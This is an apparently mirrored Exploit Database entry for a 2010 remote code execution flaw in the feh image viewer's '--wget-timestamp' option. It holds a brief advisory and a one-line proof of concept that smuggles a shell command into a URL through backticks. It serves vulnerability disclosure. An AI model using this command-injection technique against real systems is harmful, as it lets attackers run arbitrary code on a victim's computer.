feh 1.7 – ‘–wget-Timestamp’ Remote Code Execution

• Exploit Database
• 12 阅读

• 作者： anonymous
  日期： 2010-06-25
• 类别：

  • remote
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/34201/

• source: https://www.securityfocus.com/bid/41161/info
  
  feh is prone to a remote code-execution vulnerability.
  
  Attackers can exploit this issue to execute arbitrary code in the context of the user running the application. Successful exploits will compromise the application and possibly the computer. 
  
  feh --wget-timestamp 'http://www.example.com/stuff/bar`touch lol_hax`.jpg'